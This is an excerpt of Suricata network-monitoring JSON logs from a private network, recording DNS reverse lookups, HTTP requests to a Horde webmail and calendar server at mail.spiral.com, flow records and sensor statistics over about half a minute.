{"timestamp":"2020-02-29T00:10:39.544428+0000","flow_id":2107843985516552,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47317,"proto":"UDP","dns":{"type":"answer","id":4741,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:10:39.544428+0000","flow_id":2107843985516552,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47317,"proto":"UDP","dns":{"type":"answer","id":4741,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:10:39.623452+0000","flow_id":760048888043704,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52716,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5582}} {"timestamp":"2020-02-29T00:10:41.000721+0000","flow_id":1096924642080953,"event_type":"flow","src_ip":"192.168.10.130","src_port":34776,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":14,"bytes_toserver":1975,"bytes_toclient":9936,"start":"2020-02-29T00:09:06.456889+0000","end":"2020-02-29T00:09:40.905025+0000","age":34,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:10:43.000564+0000","flow_id":1628697414491026,"event_type":"flow","src_ip":"192.168.10.122","src_port":50875,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:05:42.416658+0000","end":"2020-02-29T00:05:42.525766+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:10:43.170662+0000","flow_id":2049496855059110,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":36997,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":2212,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:10:43.278991+0000","flow_id":2049496855059110,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36997,"proto":"UDP","dns":{"type":"answer","id":2212,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:10:43.278991+0000","flow_id":2049496855059110,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36997,"proto":"UDP","dns":{"type":"answer","id":2212,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:10:43.455717+0000","flow_id":1133320201266640,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34790,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6627}} 
{"timestamp":"2020-02-29T00:10:44.624419+0000","flow_id":760048888043704,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52716,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5582},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/list.php","state":"CLOSED","stored":false,"size":28526,"tx_id":2}} {"timestamp":"2020-02-29T00:10:45.000222+0000","event_type":"stats","stats":{"uptime":14297,"capture":{"kernel_packets":134462,"kernel_drops":0},"decoder":{"pkts":134466,"bytes":92818316,"invalid":185,"ipv4":132985,"ipv6":8,"ethernet":134466,"raw":0,"null":0,"sll":0,"tcp":127769,"udp":5016,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093312},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2739,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2755,"synack":2746,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1780,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2290,"failed_udp":110},"tx":{"http":4586,"smtp":0,"tls":
0,"dns_tcp":0,"dns_udp":2369}},"flow_mgr":{"closed_pruned":2722,"new_pruned":15,"est_pruned":2346,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18845,"memcap_state":0,"memcap_global":0},"http":{"memuse":96926,"memcap":0}}} {"timestamp":"2020-02-29T00:10:47.986535+0000","flow_id":1133320201266640,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34790,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6627},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":31913,"tx_id":0}} {"timestamp":"2020-02-29T00:10:47.995571+0000","flow_id":1084958869762291,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49707,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":42796,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:10:48.103585+0000","flow_id":1084958869762291,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49707,"proto":"UDP","dns":{"type":"answer","id":42796,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:10:48.103585+0000","flow_id":1084958869762291,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49707,"proto":"UDP","dns":{"type":"answer","id":42796,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:10:48.617584+0000","flow_id":1133320201266640,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34790,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24339}} {"timestamp":"2020-02-29T00:10:48.895655+0000","flow_id":1133320201266640,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34790,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24339},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/","state":"TRUNCATED","stored":false,"size":106496,"tx_id":1}} {"timestamp":"2020-02-29T00:10:48.905698+0000","flow_id":1715253910491618,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":38186,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":49899,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:10:49.013601+0000","flow_id":1715253910491618,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38186,"proto":"UDP","dns":{"type":"answer","id":49899,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:10:49.013601+0000","flow_id":1715253910491618,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38186,"proto":"UDP","dns":{"type":"answer","id":49899,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:10:49.043840+0000","flow_id":1133320201266640,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34790,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":629}} {"timestamp":"2020-02-29T00:10:49.043840+0000","flow_id":1133320201266640,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34790,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":629},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":29,"tx_id":2}} {"timestamp":"2020-02-29T00:10:49.089696+0000","flow_id":1133320201266640,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34790,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) 
Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":629},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":1644,"tx_id":2}} {"timestamp":"2020-02-29T00:10:49.100195+0000","flow_id":1940791233185635,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":40899,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":29779,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:10:49.208618+0000","flow_id":1940791233185635,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":40899,"proto":"UDP","dns":{"type":"answer","id":29779,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:10:49.208618+0000","flow_id":1940791233185635,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":40899,"proto":"UDP","dns":{"type":"answer","id":29779,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:10:49.242543+0000","flow_id":1095949691237231,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46147,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":58843,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:10:49.351235+0000","flow_id":1095949691237231,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46147,"proto":"UDP","dns":{"type":"answer","id":58843,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:10:49.351235+0000","flow_id":1095949691237231,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46147,"proto":"UDP","dns":{"type":"answer","id":58843,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:10:49.382937+0000","flow_id":1133320201266640,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34790,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":608}} {"timestamp":"2020-02-29T00:10:49.382937+0000","flow_id":1133320201266640,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34790,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":608},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":128,"tx_id":3}} {"timestamp":"2020-02-29T00:10:49.386643+0000","flow_id":1058609245547071,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34792,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) 
Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126}} {"timestamp":"2020-02-29T00:10:49.386643+0000","flow_id":1058609245547071,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34792,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":137,"tx_id":0}} {"timestamp":"2020-02-29T00:10:52.000233+0000","event_type":"stats","stats":{"uptime":14304,"capture":{"kernel_packets":134540,"kernel_drops":0},"decoder":{"pkts":134548,"bytes":92861724,"invalid":185,"ipv4":133067,"ipv6":8,"ethernet":134548,"raw":0,"null":0,"sll":0,"tcp":127839,"udp":5028,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095040},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2741,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2757,"synack":2748,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect
":{"alert":24},"app_layer":{"flow":{"http":1782,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2295,"failed_udp":111},"tx":{"http":4591,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2374}},"flow_mgr":{"closed_pruned":2722,"new_pruned":15,"est_pruned":2347,"bypassed_pruned":0,"flows_checked":4,"flows_notimeout":4,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65532,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20169,"memcap_state":0,"memcap_global":0},"http":{"memuse":123454,"memcap":0}}} {"timestamp":"2020-02-29T00:10:53.000434+0000","flow_id":2021948915723464,"event_type":"flow","src_ip":"192.168.10.122","src_port":38270,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:05:52.601288+0000","end":"2020-02-29T00:05:52.710276+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:10:54.387743+0000","flow_id":1133320201266640,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34790,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":608},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":1396,"tx_id":3}} 
{"timestamp":"2020-02-29T00:10:54.388545+0000","flow_id":1058609245547071,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34792,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":115,"tx_id":0}} {"timestamp":"2020-02-29T00:10:55.000722+0000","flow_id":1388849276691051,"event_type":"flow","src_ip":"192.168.10.81","src_port":52712,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":12,"pkts_toclient":16,"bytes_toserver":1776,"bytes_toclient":15021,"start":"2020-02-29T00:09:44.631403+0000","end":"2020-02-29T00:09:54.266905+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:10:57.000554+0000","flow_id":787811538317011,"event_type":"flow","src_ip":"192.168.10.122","src_port":36067,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:05:56.863955+0000","end":"2020-02-29T00:05:56.972258+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:10:57.000755+0000","flow_id":1544546121178258,"event_type":"flow","src_ip":"192.168.10.122","src_port":59017,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:05:56.679058+0000","end":"2020-02-29T00:05:56.787069+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:10:58.000714+0000","flow_id":1083094850400979,"event_type":"flow","src_ip":"192.168.10.130","src_port":34782,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":8,"bytes_toserver":1161,"bytes_toclient":6515,"start":"2020-02-29T00:09:52.520915+0000","end":"2020-02-29T00:09:57.718896+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:10:59.000187+0000","event_type":"stats","stats":{"uptime":14311,"capture":{"kernel_packets":134554,"kernel_drops":0},"decoder":{"pkts":134554,"bytes":92862120,"invalid":185,"ipv4":133073,"ipv6":8,"ethernet":134554,"raw":0,"null":0,"sll":0,"tcp":127845,"udp":5028,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093888},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2741,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2757,"synack":2748,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1782,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2295,"failed_udp":111},"tx":{"http":4591,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2374}},"flow_mgr":{"closed_pruned":2723,"new_pruned":15,"est_pruned":2348,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65533,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19179,"memcap_state":0,"memcap_global":0},"http":{"memuse":45095,"memcap":0}}} 
{"timestamp":"2020-02-29T00:11:06.000234+0000","event_type":"stats","stats":{"uptime":14318,"capture":{"kernel_packets":134554,"kernel_drops":0},"decoder":{"pkts":134554,"bytes":92862120,"invalid":185,"ipv4":133073,"ipv6":8,"ethernet":134554,"raw":0,"null":0,"sll":0,"tcp":127845,"udp":5028,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093600},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2741,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2757,"synack":2748,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1782,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2295,"failed_udp":111},"tx":{"http":4591,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2374}},"flow_mgr":{"closed_pruned":2724,"new_pruned":15,"est_pruned":2350,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":19179,"memcap_state":0,"memcap_global":0},"http":{"memuse":45095,"memcap":0}}} 
{"timestamp":"2020-02-29T00:11:13.000300+0000","event_type":"stats","stats":{"uptime":14325,"capture":{"kernel_packets":134554,"kernel_drops":0},"decoder":{"pkts":134554,"bytes":92862120,"invalid":185,"ipv4":133073,"ipv6":8,"ethernet":134554,"raw":0,"null":0,"sll":0,"tcp":127845,"udp":5028,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093600},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2741,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2757,"synack":2748,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1782,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2295,"failed_udp":111},"tx":{"http":4591,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2374}},"flow_mgr":{"closed_pruned":2724,"new_pruned":15,"est_pruned":2350,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":19179,"memcap_state":0,